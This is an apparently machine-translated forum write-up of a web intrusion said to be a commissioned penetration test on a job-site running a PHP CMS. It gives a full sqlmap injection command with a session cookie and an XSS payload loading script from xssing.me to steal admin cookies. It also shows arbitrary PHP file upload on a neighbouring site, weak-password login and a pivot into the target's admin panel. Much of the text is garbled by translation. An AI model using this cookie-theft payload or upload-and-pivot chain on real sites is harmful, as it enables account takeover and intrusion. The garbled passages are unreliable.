Author: Liuker Original: http://www.anying.org/thread-88-1-1.html reprint must be noted.
0x1 Preface: I really don't know what to write. The current WEB penetration methods come and go. So I wrote an article using the latest project.
0x2
Because XX talent network was hacked, we asked our company for penetration testing. The vulnerability has been hacked several times, and the penetration is difficult.
0x3
Necessary information collection
IP: XXX. XX. XX. X
Port: 80
Script: php
In the linux + IIS 9.0 environment, what should be the strange linux + IIS environment? IIS9.0 is actually very simple. The so-called IIS9.0 is modified by apache.
The program is CWEBS, a set of paid programs
The target site has user registration and upload
0x4
Scan
Tool scan for http://www.xxxx.com/info.php
Obtain sensitive information, such as the absolute path of the website, and extract the information used in the article if not much information is written.
/Home/web0906p1/htdocs/info. php
The background address is http://www.xxxx.com/admin
Injection Point discovered
Http://www.xxxx.com /? Ctl = Query & act = File & typeid = 455
FCK editor exists
Http://www.xxxx.com/plus/FCKedit... nnectors/test.html #
58 neighboring stations are Cwebs
0x6
Detect and exploit existing vulnerabilities
The upload directory is found at the upload process. The user name is used as the upload directory.
/Upfiles/Person // 111.asp/ 40fe81afefd207b403e3c5acd3a0984c.jpg
Non-IIS 6.0 fruitless
Use payload of burpsuite to filter out PHP extensions. JSP cannot be executed
The FCK editor is changed to a white list.
The injection vulnerability is exploited as follows:
Python "C: \ Tools \ sqlmapgui \ sqlmap. py"-v 1 -- beep -- eta -- batch-u "http://www.xxxx.com /? Ctl = Query & act = File & typeid = 455 "-- level = 3 -- risk = 2 -- data =" XM = 1111 & SFZ = 1 "-- cookie =" PHPSESSID = 10f9b3c61c2cd1_a6fd28a42442221" -- dbms = mysql -- technique BEUST -- union-cols = 1-10 -- time-sec = 5 -- banner -- current-user -- current-db -- is-dba -- users -- dbs
Figure 1
Upload at the day before yesterday Download Attachment(46.25 KB)
Then the injection always prompts 403
Visual NFS Firewall
Then you can see an online consultation on the main site.
Figure 2
Upload at the day before yesterday Download Attachment(39.36 KB)
Then we found that XSS exists.
Insert Code
<Script src = "http://xssing.me/api1694"> </script> in title
Figure 3
Upload at the day before yesterday Download Attachment(31.3 KB)
Then wait for cookies
0x6
Cwebs
It took three hours to watch the site.
Www.1111.com
Any file can be uploaded if the website feedback is sent from the peer site.
Figure 4
Upload at the day before yesterday Download Attachment(63.71 KB)
Upload the PHP file to obtain the address.
Upload at the day before yesterday Download Attachment(31.56 KB)
Http://1111.com/tell/web_idea.ph... 540e581f720a2a0. php
It hurts
Download the file directly, but we can determine 00f3cf0b74840a2b3540e581f720a2a0. php is the file name.
Then find the path of some files on the website.
Egg
However, management also hurts.
Try to combine weak passwords using burpsuite
Directly 1111 1111 (1111 represents the domain name)
However, it hurts to enter the background.
Simple background
Upload at the day before yesterday Download Attachment(52.52 KB)
The background management does not support opera.
No IE6.0
Only element reviews can be obtained
Http://1111.com//admin/news/news_mng.php
News Management Interface
Click to modify a news article
Figure 7
Upload at the day before yesterday Download Attachment(76.63 KB)
You can upload any script on the frontend to see that the backend can be uploaded as needed.
Upload php to view the source code.
Http://1111.com/images/gist/20130305145927%0%.php
Figure 8
Upload at the day before yesterday Download Attachment(116.52 KB)
Then we can combine the path of the target station.
/Home/web0906p1/htdocs/info. php
Try cross-site
Success
Figure 9
Upload at the day before yesterday Download Attachment(82.93 KB)
Then, the cookies are logged on to the XSS platform.
Figure 10
Upload at the day before yesterday Download Attachment(44.5 KB)
Then, log on to the background.
Figure 11
Upload at the day before yesterday Download Attachment(47.79 KB)
So far, I am exhausted.